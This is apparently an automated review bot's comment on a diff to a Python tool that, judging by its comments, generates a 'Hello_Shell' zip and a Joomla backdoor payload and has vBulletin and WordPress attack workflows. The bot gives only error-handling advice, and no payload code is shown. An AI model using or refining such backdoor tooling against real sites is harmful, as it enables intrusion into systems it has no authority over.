hello_shell.zip file + generate_helloshell() + # Make the js_alert.sh file executable + enable_js_alert() + # Launch the main menu + main_menu()
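Review bot: The two setup calls added under `if __name__ == "__main__":` run unconditionally on every launch with no error handling visible in the hunk, so a failure in `generate_helloshell()` or `enable_js_alert()` (presumably a missing input file or an unwritable working directory) would abort the script before `main_menu()` is reached, even for the vBulletin and WordPress workflows that, judging by the comments, never use the zip or the `js_alert.sh` mode change. Consider moving each call into the code path that needs its artefact, or at least wrapping it in a `try`/`except (IOError, OSError) as error:` that prints ` [!] Startup step failed: {}`.format(error) and continues to the menu. The comments should also say where the files are written, e.g. `# Generate Hello_Shell.zip in the current working directory (needed only by the Joomla backdoor payload)`. The bodies of `generate_helloshell()` and `enable_js_alert()` are outside this hunk, so whether they already handle errors cannot be confirmed from here.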